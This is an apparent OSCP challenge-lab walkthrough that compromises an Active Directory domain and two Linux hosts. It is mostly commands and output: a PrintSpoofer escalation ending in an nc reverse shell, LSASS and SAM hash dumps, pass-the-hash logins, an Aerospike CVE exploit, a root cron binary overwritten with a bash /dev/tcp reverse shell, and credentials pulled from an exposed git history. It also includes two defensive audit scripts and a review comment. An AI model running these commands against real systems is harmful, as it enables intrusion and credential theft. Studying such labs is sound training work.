Information
About this lab
This lab involves a sophisticated attack chain against an Active Directory environment. Learners begin by exploiting a vulnerable web app to achieve remote code execution, followed by privilege escalation through privilege abuse. Through lateral movement, pivoting across network segments, and cracking Kerberos tickets, learners must enumerate and compromise domain assets to achieve full domain control.
Active Directory Set
192.168.122.141 - MS01
Eric.Wallows / EricLikesRunning800
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
5985/tcp open wsman
Initial Access
Evil-WinRM
Privilege Escalation
Evil-WinRM
- SeImpersonatePrivilege is present
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 192.168.122.141 -u 'Eric.Wallows' -p 'EricLikesRunning800'
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled

PrintSpoofer64
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> upload PrintSpoofer64.exe
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> upload nc64.exe
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\PrintSpoofer64.exe -c "nc64.exe 192.168.45.219 4444 -e powershell"

nc
- Administrator privileges obtained
┌──(kali㉿kali)-[~/oscp_a]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.219] from (UNKNOWN) [192.168.122.141] 55321
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Windows\system32>

Post-Exploitation
Add the eric.wallows account to the local Administrators group
PS C:\Users> net localgroup Administrators eric.wallows /add
net localgroup Administrators eric.wallows /add
The command completed successfully.

nxc lsassy dump
- celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd
- Mary.Williams:9a3121977ee93af56ebd0ef4f527a35e
┌──(kali㉿kali)-[~/oscp_a]
└─$ nxc smb 192.168.122.141 -u 'Eric.Wallows' -p 'EricLikesRunning800' -M lsassy
SMB 192.168.122.141 445 MS01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:MS01) (domain:oscp.exam) (signing:False) (SMBv1:False)
SMB 192.168.122.141 445 MS01 [+] oscp.exam\Eric.Wallows:EricLikesRunning800 (Pwn3d!)
LSASSY 192.168.122.141 445 MS01 OSCP\celia.almeda e728ecbadfb02f51ce8eed753f3ff3fd
LSASSY 192.168.122.141 445 MS01 MS01\Mary.Williams 9a3121977ee93af56ebd0ef4f527a35e
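The lsassy dump above and the impacket-secretsdump SAM dump in the MS02 section are the kind of material a defender should triage immediately after such an assessment. The following is an added example, not part of the original writeup: it parses both line formats and reports blank passwords, NT hashes shared between accounts, and the same account cached on several hosts. All sample lines are constructed.

```python
"""Added example, not part of the original writeup: defender-side triage of
dumped credential material such as the nxc lsassy output above and the
impacket-secretsdump SAM dump in the MS02 section. It flags accounts with a
blank password, one NT hash shared by several accounts (password reuse), and
the same account cached on several hosts. The sample lines are constructed."""
import re
from collections import defaultdict

# NT hash of the empty string: an account carrying it has no password set
# (or is a disabled built-in that must stay disabled).
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# nxc lsassy module line: LSASSY <ip> <port> <host> DOMAIN\user <nthash>
LSASSY_RE = re.compile(
    r"^LSASSY\s+(?P<ip>\S+)\s+\d+\s+(?P<host>\S+)\s+"
    r"(?P<domain>[^\\\s]+)\\(?P<user>\S+)\s+(?P<nt>[0-9a-fA-F]{32})\s*$"
)
# secretsdump SAM line: user:rid:lmhash:nthash:::
SECRETSDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_dump(lines, default_host):
    """Yield (host, account, nt_hash); account is DOMAIN\\user, lower-cased.
    secretsdump lines carry no host, so default_host names the machine."""
    for line in lines:
        line = line.strip()
        m = LSASSY_RE.match(line)
        if m:
            yield m["host"], f"{m['domain']}\\{m['user']}".lower(), m["nt"].lower()
            continue
        m = SECRETSDUMP_RE.match(line)
        if m:
            yield default_host, f"{default_host}\\{m['user']}".lower(), m["nt"].lower()


def triage(lines, default_host="LOCAL"):
    """Return the three defender findings as plain dict/list structures."""
    entries = list(parse_dump(lines, default_host))
    accounts_by_hash = defaultdict(set)
    hosts_by_account = defaultdict(set)
    blank = set()
    for host, account, nt in entries:
        hosts_by_account[account].add(host)
        if nt == EMPTY_NT_HASH:
            blank.add(account)
        else:
            accounts_by_hash[nt].add(account)
    return {
        "blank_password": sorted(blank),
        "hash_reuse": {nt: sorted(a) for nt, a in accounts_by_hash.items() if len(a) > 1},
        "cached_on_hosts": {a: sorted(h) for a, h in hosts_by_account.items() if len(h) > 1},
    }


# Constructed sample: two lsassy hosts plus one SAM dump taken on HOST2.
SAMPLE_DUMP = r"""
LSASSY 10.0.0.5 445 HOST1 CORP\alice 11111111111111111111111111111111
LSASSY 10.0.0.5 445 HOST1 HOST1\svc_backup 22222222222222222222222222222222
LSASSY 10.0.0.6 445 HOST2 CORP\alice 11111111111111111111111111111111
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ops_admin:1001:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
""".strip().splitlines()


def demo():
    return triage(SAMPLE_DUMP, default_host="HOST2")


if __name__ == "__main__":
    for section, hits in demo().items():
        print(f"{section}: {hits}")
```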
Pivoting
kali
┌──(kali㉿kali)-[~/oscp_a]
└─$ sudo ligolo-proxy -selfcert
[sudo] password for kali:
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
INFO[0000] Listening on 0.0.0.0:11601
Version: dev
ligolo-ng » INFO[0182] Agent joined. id=005056ab00d4 name="NT AUTHORITY\\SYSTEM@MS01" remote="192.168.122.141:53233"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - NT AUTHORITY\SYSTEM@MS01 - 192.168.122.141:53233 - 005056ab00d4
[Agent : NT AUTHORITY\SYSTEM@MS01] » interface_create --name ligolo
INFO[0189] Creating a new ligolo interface...
INFO[0189] Interface created!
[Agent : NT AUTHORITY\SYSTEM@MS01] » start
INFO[0192] Starting tunnel to NT AUTHORITY\SYSTEM@MS01 (005056ab00d4)
[Agent : NT AUTHORITY\SYSTEM@MS01] » route_add --name ligolo --route 10.10.184.0/24
INFO[0219] Route created.

windows
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\agent.exe -connect 192.168.45.219:11601 -ignore-cert

10.10.184.142 - MS02
Nmap
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman

Initial Access
nxc
- oscp.exam\celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd (Pwn3d!)
┌──(kali㉿kali)-[~/oscp_a]
└─$ nxc winrm 10.10.184.140 10.10.184.142 -u users.txt -H hashes.txt -t 100
WINRM 10.10.184.140 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:oscp.exam)
WINRM 10.10.184.142 5985 MS02 [*] Windows 10 / Server 2019 Build 19041 (name:MS02) (domain:oscp.exam)
WINRM 10.10.184.142 5985 MS02 [+] oscp.exam\celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd (Pwn3d!)

evil-winrm
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 10.10.184.142 -u 'celia.almeda' -H 'e728ecbadfb02f51ce8eed753f3ff3fd'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\celia.almeda\Documents>

Privilege Escalation
Download the SAM and SYSTEM files
*Evil-WinRM* PS C:\windows.old\Windows\System32> download SAM
*Evil-WinRM* PS C:\windows.old\Windows\System32> download SYSTEM

Hash dump
- Administrator:31d6cfe0d16ae931b73c59d7e0c089c0
- tom_admin:4979d69d4ca66955c075c41cf45f24dc
- Cheyanne.Adams:b3930e99899cb55b4aefef9a7021ffd0
- David.Rhys:9ac088de348444c71dba2dca92127c11
- Mark.Chetty:92903f280e5c5f3cab018bd91b94c771
┌──(kali㉿kali)-[~/oscp_a]
└─$ impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x8bca2f7ad576c856d79b7111806b533d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:acbb9b77c62fdd8fe5976148a933177a:::
tom_admin:1001:aad3b435b51404eeaad3b435b51404ee:4979d69d4ca66955c075c41cf45f24dc:::
Cheyanne.Adams:1002:aad3b435b51404eeaad3b435b51404ee:b3930e99899cb55b4aefef9a7021ffd0:::
David.Rhys:1003:aad3b435b51404eeaad3b435b51404ee:9ac088de348444c71dba2dca92127c11:::
Mark.Chetty:1004:aad3b435b51404eeaad3b435b51404ee:92903f280e5c5f3cab018bd91b94c771:::

nxc
- tom_admin:4979d69d4ca66955c075c41cf45f24dc (Pwn3d!)
┌──(kali㉿kali)-[~/oscp_a]
└─$ nxc winrm 10.10.184.142 -u users.txt -H hashes.txt --continue-on-success -t 100
WINRM 10.10.184.142 5985 MS02 [*] Windows 10 / Server 2019 Build 19041 (name:MS02) (domain:oscp.exam)
WINRM 10.10.184.142 5985 MS02 [-] oscp.exam\Aimee.Hunt:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.184.142 5985 MS02 [-] oscp.exam\Carol.Webb:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.184.142 5985 MS02 [+] oscp.exam\celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd (Pwn3d!)
WINRM 10.10.184.142 5985 MS02 [-] oscp.exam\celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd zip() argument 2 is longer than argument 1
WINRM 10.10.184.142 5985 MS02 [-] oscp.exam\Chelsea.Byrne:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.184.142 5985 MS02 [-] oscp.exam\Donna.Johnson:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.184.142 5985 MS02 [-] oscp.exam\Emily.Bishop:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.184.142 5985 MS02 [-] oscp.exam\eric.wallows:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.184.142 5985 MS02 [+] oscp.exam\tom_admin:4979d69d4ca66955c075c41cf45f24dc (Pwn3d!)

evil-winrm
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 10.10.184.142 -u 'tom_admin' -H '4979d69d4ca66955c075c41cf45f24dc'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tom_admin\Documents>

10.10.184.140 - DC01
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman

Initial Access (Administrator Privilege)
evil-winrm
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 10.10.184.140 -u 'tom_admin' -H '4979d69d4ca66955c075c41cf45f24dc'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tom_admin\Documents>

proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/12/2025 6:50 AM 34 proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
a728672bb26239bb2587cc98b930bb55

Independent Challenges
192.168.122.143 - Aero
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
443/tcp open https
3000/tcp open ppp
3001/tcp open nessus
3003/tcp open cgms
3306/tcp open mysql
5432/tcp open postgresql

Initial Access
Access the web service on port 81
- The string “Attendance and Payroll System” was found in the page source
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Attendance and Payroll System</title>

Searching for “3003/tcp open cgms” → found Aerospike Database 5.1.0.3 - OS Command Execution (CVE-2020-13151)
POC https://github.com/b4ny4n/CVE-2020-13151
┌──(kali🎃kali)-[~/oscp_a/143/CVE-2020-13151]
└─$ python cve2020-13151.py --ahost 192.168.122.143 --netcatshell --lhost=192.168.45.219 --lport=3000
[+] aerospike build info: 5.1.0.1
[+] looks vulnerable
[+] populating dummy table.
[+] writing to test.cve202013151
[+] wrote MzTztxQFPOETJUBD
[+] registering udf
[+] sending payload, make sure you have a listener on 192.168.45.219:3000.....
nc
┌──(kali🎃kali)-[~]
└─$ rlwrap nc -nlvp 3000
listening on [any] 3000 ...
connect to [192.168.45.219] from (UNKNOWN) [192.168.122.143] 58878
/bin/sh: 0: can't access tty; job control turned off
$

shell spawning
python -c 'import pty; pty.spawn("/bin/bash")'

local.txt
aero@oscp:/home/aero$ cat local.txt
cat local.txt
d215e07defe543400153f2fb5c6f30f3

Privilege Escalation
linpeas upload via scp
- kali → target
aero@oscp:/etc$ scp kali@192.168.45.219:~/oscp_a/tools/linpeas.sh /tmp/
scp kali@192.168.45.219:~/oscp_a/tools/linpeas.sh /tmp/
The authenticity of host '192.168.45.219 (192.168.45.219)' can't be established.
ECDSA key fingerprint is SHA256:vRI4BwMX0mkIFr1rxD1EuPqzvvum/BOX43B/o3MN8ps.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
yes
Warning: Permanently added '192.168.45.219' (ECDSA) to the list of known hosts.
kali@192.168.45.219's password: kali
linpeas.sh 100% 953KB 1.3MB/s 00:00

linpeas
- /root/aerospike.sh runs every minute
- Only root can access it, so its contents cannot be inspected
╔══════════╣ Check for vulnerable cron jobs
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs
══╣ Cron jobs list
*/1 * * * * root /root/aerospike.sh

pspy64s
- /opt/aerospike/bin/asadm is executed periodically
2025/12/13 17:24:08 CMD: UID=0 PID=65228 | python2.7 /opt/aerospike/bin/asadm --asinfo-mode -e 'STATUS'
2025/12/13 17:24:09 CMD: UID=0 PID=65230 | python2.7 /opt/aerospike/bin/asadm --asinfo-mode -e 'STATUS'
- accessible
aero@oscp:/$ ls -al /opt/aerospike/bin/asadm
ls -al /opt/aerospike/bin/asadm
-rwxr-xr-x 1 aero aero 6723733 Dec 7 2019 /opt/aerospike/bin/asadm

overwrite asadm
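The chain just found (a root cron job runs /root/aerospike.sh, which in turn runs the aero-owned /opt/aerospike/bin/asadm) is exactly what a periodic host audit should catch. The following is an added example, not part of the original writeup: it parses system crontab lines, follows the absolute paths each job references one level into readable scripts, and reports any file in that chain that a non-root user can modify. The stat and read functions are injectable, so the constructed sample runs offline; the defaults query the live system.

```python
"""Added example, not part of the original writeup: a defender-side audit for
the weakness found above, where a root cron job (/root/aerospike.sh) runs a
binary (/opt/aerospike/bin/asadm) that a non-root user owns. stat/read are
injectable so the sample runs offline against constructed metadata."""
import os
import re
import stat
from dataclasses import dataclass


@dataclass
class FileInfo:
    owner_uid: int
    mode: int  # permission bits only, e.g. 0o755


# /etc/crontab and /etc/cron.d entries: 5 time fields (or @keyword), user, command
SYSTEM_CRON_RE = re.compile(r"^(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")
ABS_PATH_RE = re.compile(r"(?<![\w-])/[\w./-]+")


def default_stat(path):
    try:
        st = os.stat(path)
    except OSError:
        return None
    return FileInfo(st.st_uid, stat.S_IMODE(st.st_mode))


def default_read(path, limit=65536):
    try:
        with open(path, errors="replace") as fh:
            return fh.read(limit)
    except OSError:
        return ""


def parse_cron(lines):
    """Yield (user, command) for real job lines; skip comments and VAR=value."""
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = SYSTEM_CRON_RE.match(line)
        if m:
            yield m["user"], m["cmd"]


def audit_cron(cron_lines, stat_fn=default_stat, read_fn=default_read, depth=1):
    """Return [(path, reason)] for files a non-root user could swap under a job."""
    findings = []
    for user, cmd in parse_cron(cron_lines):
        for path in ABS_PATH_RE.findall(cmd):
            _check(path, user, f"cron entry '{cmd}'", stat_fn, read_fn, depth, findings)
    return findings


def _check(path, cron_user, via, stat_fn, read_fn, depth, findings):
    info = stat_fn(path)
    if info is None:  # not present; nothing to evaluate here
        return
    group_or_other_writable = bool(info.mode & (stat.S_IWGRP | stat.S_IWOTH))
    if (cron_user == "root" and info.owner_uid != 0) or group_or_other_writable:
        findings.append((path, f"writable by non-root (uid {info.owner_uid}, "
                               f"mode {info.mode:o}), run as {cron_user} via {via}"))
    if depth > 0:  # follow what a readable script itself invokes
        for nested in ABS_PATH_RE.findall(read_fn(path)):
            if nested != path:
                _check(nested, cron_user, path, stat_fn, read_fn, depth - 1, findings)


# Constructed sample mirroring the layout found above (uid 1000 stands for 'aero').
SAMPLE_CRON = ["# m h dom mon dow user command", "SHELL=/bin/sh",
               "*/1 * * * * root /root/aerospike.sh"]
SAMPLE_FS = {"/root/aerospike.sh": FileInfo(0, 0o700),
             "/usr/bin/python2.7": FileInfo(0, 0o755),
             "/opt/aerospike/bin/asadm": FileInfo(1000, 0o755)}
SAMPLE_TEXT = {"/root/aerospike.sh":
               "#!/bin/bash\n/usr/bin/python2.7 /opt/aerospike/bin/asadm --asinfo-mode -e 'STATUS'\n"}


def demo():
    return audit_cron(SAMPLE_CRON, SAMPLE_FS.get, lambda p: SAMPLE_TEXT.get(p, ""))


if __name__ == "__main__":
    for path, reason in demo():
        print(path, "-", reason)
```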
aero@oscp:/$ echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.219/443 0>&1'" > /opt/aerospike/bin/asadm

proof.txt
┌──(kali🎃kali)-[~/oscp_a/143]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.219] from (UNKNOWN) [192.168.122.143] 50914
bash: cannot set terminal process group (66614): Inappropriate ioctl for device
bash: no job control in this shell
root@oscp:/#
root@oscp:~# cat /root/proof.txt
cat /root/proof.txt
7892ec77669dc931577f4eac740479f5

192.168.122.144 - Crystal
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Initial Access
nmap script
- Git repository found
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-generator: Nicepage 4.21.12, nicepage.com
|_http-title: Home
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-git:
| 192.168.122.144:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: Security Update
| Remotes:
|_ https://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@github.com/PWK-Challenge-Lab/dev.git

Access over HTTP
http://192.168.122.144/.git/
Dump the Git repository with wget
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ wget -r "http://192.168.122.144/.git/"

git log
┌──(kali🎃kali)-[~/oscp_a/144/192.168.122.144/.git]
└─$ git log
commit 44a055daf7a0cd777f28f444c0d29ddf3ff08c54 (HEAD -> main)
Author: Stuart <luke@challenge.pwk>
Date: Fri Nov 18 16:58:34 2022 -0500
Security Update
commit 621a2e79b3a4a08bba12effe6331ff4513bad91a (origin/main, origin/HEAD)
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 23:57:12 2022 +0200
Create database.php
commit c9c8e8bd0a4b373190c4258e16e07a6296d4e43c
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 23:56:19 2022 +0200
Delete database.php
commit eda55ed6455d29532295684e3900cda74d695067
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:27:40 2022 +0200
Create robots.txt
commit ce3d418cc1bb5c5388fdc00cee5ba1cb764f499b
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:27:08 2022 +0200
Create search.php
commit 80ad5fe45438bb1b9cc5932f56af2e9be7e96046
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:26:09 2022 +0200
Setting up database.php
commit 58cfadc91978ec5db50a03c571493e3038d2935d
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:22:48 2022 +0200
Create index.php
commit 5e212bcd0b8d5815af1c4fdfccd6a07c16e1330b
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:22:22 2022 +0200
Create order.php
commit 0822a51f607bb05c0e6230acd74f27e7b6130934
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:21:50 2022 +0200
Create export.php
commit 1c48db4a587970ee95208f3f408676505e343318
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:21:11 2022 +0200
Initial commit

git show
- Credentials found
- stuart@challenge.lab / BreakingBad92
┌──(kali🎃kali)-[~/oscp_a/144/192.168.122.144/.git]
└─$ git show 44a055daf7a0cd777f28f444c0d29ddf3ff08c54
commit 44a055daf7a0cd777f28f444c0d29ddf3ff08c54 (HEAD -> main)
Author: Stuart <luke@challenge.pwk>
Date: Fri Nov 18 16:58:34 2022 -0500
Security Update
diff --git a/configuration/database.php b/configuration/database.php
index 55b1645..8ad08b0 100644
--- a/configuration/database.php
+++ b/configuration/database.php
@@ -2,8 +2,9 @@
class Database{
private $host = "localhost";
private $db_name = "staff";
- private $username = "stuart@challenge.lab";
- private $password = "BreakingBad92";
+ private $username = "";
+ private $password = "";
+// Cleartext creds cannot be added to public repos!
public $conn;
public function getConnection() {
$this->conn = null;

SSH login with the discovered account
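Review bot: Regarding the database.php hunk above, blanking `$username` and `$password` does not retire the values; the `-` lines of this very hunk still carry `private $password = "BreakingBad92";`, as does every earlier revision, so anyone who can read the history (and the Nmap output shows the repository exposed under /.git/ on the web server) recovers them with `git show` on the parent commit. The credential has to be rotated and the exposed history treated as compromised; to honour the policy in the new `// Cleartext creds cannot be added to public repos!` comment, the values should also be read from outside the tracked file (an environment variable or an ignored local config) rather than left as empty strings that `getConnection()` will use.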
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ ssh stuart@192.168.122.144
The authenticity of host '192.168.122.144 (192.168.122.144)' can't be established.
ED25519 key fingerprint is: SHA256:NQ0P6b7BgHDdEToc64di95hvEzS2pdZ7E02r4ZBkBYM
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:56: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.122.144' (ED25519) to the list of known hosts.
stuart@192.168.122.144's password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-53-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Dec 14 03:15:24 PM UTC 2025
System load: 0.0 Processes: 201
Usage of /: 39.9% of 18.53GB Users logged in: 0
Memory usage: 7% IPv4 address for ens160: 192.168.122.144
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Mon Oct 31 14:48:02 2022 from 192.168.118.5
stuart@oscp:~$

local.txt
stuart@oscp:~$ cat local.txt
cfd945bb16d2480927d571c2deef9cee

Privilege Escalation
linpeas
- backup folder
╔══════════╣ Backup folders
drwxr-xr-x 2 root root 4096 Nov 18 2022 /opt/backup
total 84
-rw-r--r-- 1 stuart stuart 26890 Apr 5 2018 sitebackup1.zip
-rw-r--r-- 1 stuart stuart 24701 Nov 18 2022 sitebackup2.zip
-rw-r--r-- 1 stuart stuart 25312 Mar 5 2020 sitebackup3.zip
drwxr-xr-x 2 root root 3 Apr 15 2020 /snap/core20/1405/var/backups
total 0
drwxr-xr-x 2 root root 3 Apr 15 2020 /snap/core20/1695/var/backups
total 0
drwxr-xr-x 2 root root 4096 Dec 14 15:04 /var/backups
total 724
-rw-r--r-- 1 root root 51200 Dec 14 14:51 alternatives.tar.0
-rw-r--r-- 1 root root 36870 Nov 18 2022 apt.extended_states.0
-rw-r--r-- 1 root root 0 Dec 14 14:51 dpkg.arch.0
-rw-r--r-- 1 root root 268 Oct 31 2022 dpkg.diversions.0
-rw-r--r-- 1 root root 135 Nov 18 2022 dpkg.statoverride.0
-rw-r--r-- 1 root root 636365 Nov 18 2022 dpkg.status.0

Download the backup files with scp
stuart@oscp:/opt/backup$ scp sitebackup1.zip kali@192.168.45.199:~/oscp_a/144/
The authenticity of host '192.168.45.199 (192.168.45.199)' can't be established.
ED25519 key fingerprint is SHA256:C/sPlE+2KjQOvOF6Xgy+YaE8+67OyeJHsui04dPIApU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.45.199' (ED25519) to the list of known hosts.
kali@192.168.45.199's password:
sitebackup1.zip 100% 26KB 114.0KB/s 00:00
stuart@oscp:/opt/backup$ scp sitebackup2.zip kali@192.168.45.199:~/oscp_a/144/
kali@192.168.45.199's password:
sitebackup2.zip 100% 24KB 109.9KB/s 00:00
stuart@oscp:/opt/backup$ scp sitebackup3.zip kali@192.168.45.199:~/oscp_a/144/
kali@192.168.45.199's password:
sitebackup3.zip

Extract with 7z
- Password required
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ 7z x sitebackup3.zip
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 25312 bytes (25 KiB)
Extracting archive: sitebackup3.zip
--
Path = sitebackup3.zip
Type = zip
Physical Size = 25312
Enter password (will not be echoed):

Extract the password hash with zip2john
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ zip2john sitebackup3.zip > sitebackup3_hashes.hash
ver 2.0 sitebackup3.zip/joomla/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/administrator/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/api/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/cache/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/cli/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/components/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/images/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/includes/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/language/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/language/overrides/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/layouts/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/libs/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/media/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/modules/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/plugins/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/templates/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/tmp/ is not encrypted, or stored with non-handled compression type

Crack the password with john
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt sitebackup3_hashes.hash
Using default input encoding: UTF-8
Loaded 19 password hashes with 19 different salts (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
